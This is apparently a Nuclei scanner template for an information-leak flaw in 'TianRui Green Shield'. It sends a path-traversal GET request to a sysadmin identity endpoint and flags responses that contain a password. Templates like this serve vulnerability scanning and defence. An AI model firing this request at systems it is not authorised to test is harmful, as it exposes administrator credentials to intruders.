http:
    - matchers:
        - part: body
          type: word
          words:
            - password
            - "true"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /trwfe/service/../ws/identity/user/sysadmin HTTP/1.1
          Host: {{Hostname}}
id: TianRui-sysadmin-InfoLeak
info:
    author: HuanXiong
    description: ""
    name: TianRui Green Shield Information Leakage
    severity: high
    tags:
        - information-leakage
        - sensitive-info
